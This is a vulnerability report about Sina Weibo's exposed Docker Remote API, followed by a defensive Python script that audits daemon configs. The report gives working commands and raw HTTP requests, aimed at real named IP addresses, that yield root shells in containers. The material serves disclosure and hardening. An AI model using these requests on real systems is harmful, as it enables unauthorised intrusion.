
Sina Weibo: unauthenticated access to the Docker Remote API leads to remote command execution (root)

2016-05-18 05:50

Code:
http://123.125.105.158:2375/version
http://123.125.105.159:2375/version

The response reports "ApiVersion":"1.17". That version is so old that my docker client cannot talk to it, so I used Burp to send the requests by hand and obtained remote execution of system commands; this needs one small trick.

[Image: weibo.apiversion.png]

Proof of vulnerability:

Install the docker client:

Code:
https://www.docker.com/products/docker-toolbox



Taking that Baidu IP as an example: to get an interactive shell, first list the images:

Code:
docker -H tcp://180.76.161.55:2375 images

Code:
docker -H tcp://180.76.161.55:2375 run -it --entrypoint /bin/bash ubuntu "-h"



Here I set the entrypoint to /bin/bash. The shell is obtained, as shown below:

[Image: baidu_shell.png]



Now back to the Weibo machines. Because the API version is too old, the client cannot be used directly.

At first my commands kept failing; only when I inspected the container did I find that the default Entrypoint is /usr/local/sinasrv2/sbin/nginx. It can be overwritten when the container is created, though. Create a container:

Code:
POST /v1.17/containers/create HTTP/1.1
Host: 123.125.105.158:2375
User-Agent: Docker-Client/1.7.0 (windows)
Content-Length: 1082
Content-Type: application/json
Accept-Encoding: gzip

{"Hostname":"","Domainname":"","User":"","AttachStdin":true,"AttachStdout":true,"AttachStderr":true,"ExposedPorts":{},"PublishService":"","Tty":true,"OpenStdin":true,"StdinOnce":true,"Env":[],"Cmd":["-h"],"Image":"registry.intra.weibo.com/weibo_blogarticle/tfs-nginx:20150625","Volumes":{},"VolumeDriver":"","WorkingDir":"","Entrypoint":["/bin/bash","-c"],"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"Labels":{},"HostConfig":{"Binds":null,"ContainerIDFile":"","LxcConf":[],"Memory":0,"MemorySwap":0,"CpuShares":0,"CpuPeriod":0,"CpusetCpus":"","CpusetMems":"","CpuQuota":0,"BlkioWeight":0,"OomKillDisable":false,"MemorySwappiness":-1,"Privileged":false,"PortBindings":{},"Links":null,"PublishAllPorts":false,"Dns":null,"DnsSearch":null,"ExtraHosts":null,"VolumesFrom":null,"Devices":[],"NetworkMode":"","IpcMode":"","PidMode":"","UTSMode":"","CapAdd":null,"CapDrop":null,"GroupAdd":null,"RestartPolicy":{"Name":"no","MaximumRetryCount":0},"SecurityOpt":null,"ReadonlyRootfs":false,"Ulimits":null,"LogConfig":{"Type":"","Config":{}},"CgroupParent":"","ConsoleSize":[42,80]}}



Find the Id in the response, as shown:

[Image: weibo_create_container.png]



Then you can fetch the container's information to check that nothing is wrong; this step can be skipped:

Code:
http://123.125.105.158:2375/v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/json



Next come two HTTP requests. The order is critical: attach first, then start, so that the output is captured:

Code:
POST /v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/attach?stderr=1&stdin=1&stdout=1&stream=1 HTTP/1.1
Host: 123.125.105.158:2375
User-Agent: Docker-Client/1.7.0 (windows)
Content-Length: 0
Content-Type: application/json
Accept-Encoding: gzip

Code:
POST /v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/start HTTP/1.1
Host: 123.125.105.158:2375
User-Agent: Docker-Client/1.7.0 (windows)
Content-Length: 0
Content-Type: application/json
Accept-Encoding: gzip



As the figure shows, I ran commands inside the Weibo container: the current user is root, the hostname is bcd44e3731cc, and the working directory is app.

[Image: weibo.rce.out.png]



Fix:

Do not expose port 2375 to the outside.
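One way to check a host for the misconfiguration behind this report, as an added example that is not part of the original write-up: it audits the two places a Docker daemon's listeners are configured (the "hosts" key in /etc/docker/daemon.json and the -H/--host flags on the systemd ExecStart line) and flags any tcp:// listener reachable beyond loopback that is not protected by --tlsverify. The daemon.json keys and dockerd flags are real; the sample configurations are constructed for illustration.

```python
import json
import shlex
from urllib.parse import urlsplit

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def dockerd_argv(exec_start: str) -> list:
    """Return dockerd's argv from a systemd 'ExecStart=...' line ([] if none given)."""
    if not exec_start.strip():
        return []
    return shlex.split(exec_start.split("=", 1)[1])


def audit_docker_listeners(daemon_json: str, exec_start: str = "") -> list:
    """Return one finding per non-loopback tcp:// listener that lacks --tlsverify."""
    cfg = json.loads(daemon_json) if daemon_json.strip() else {}
    argv = dockerd_argv(exec_start)
    hosts = list(cfg.get("hosts", []))
    for i, tok in enumerate(argv):
        if tok in ("-H", "--host") and i + 1 < len(argv):
            hosts.append(argv[i + 1])
        elif tok.startswith(("-H=", "--host=")):
            hosts.append(tok.split("=", 1)[1])
    tlsverify = bool(cfg.get("tlsverify")) or "--tlsverify" in argv or "--tlsverify=true" in argv
    tls_only = bool(cfg.get("tls")) or "--tls" in argv or "--tls=true" in argv
    findings = []
    for h in hosts:
        if not h.startswith("tcp://"):
            continue  # unix:// and fd:// sockets are local to the host
        bind = urlsplit(h).hostname or "0.0.0.0"  # 'tcp://:2375' binds all interfaces
        if bind in LOOPBACK or tlsverify:
            continue
        if tls_only:
            findings.append(f"HIGH: {h} uses TLS but does not verify client certificates")
        else:
            findings.append(f"CRITICAL: {h} accepts Docker API calls with no authentication")
    return findings


# Constructed samples: the exposure seen in this report (plain TCP on 2375) and a hardened daemon.json.
WEAK_UNIT = "ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375"
HARDENED_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"], "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem", "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem"})
```

Running `audit_docker_listeners("{}", WEAK_UNIT)` yields one CRITICAL finding for tcp://0.0.0.0:2375, while `audit_docker_listeners(HARDENED_JSON)` returns an empty list.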

Source: www.wooyun.org/bugs/wooyun-2016-0209856
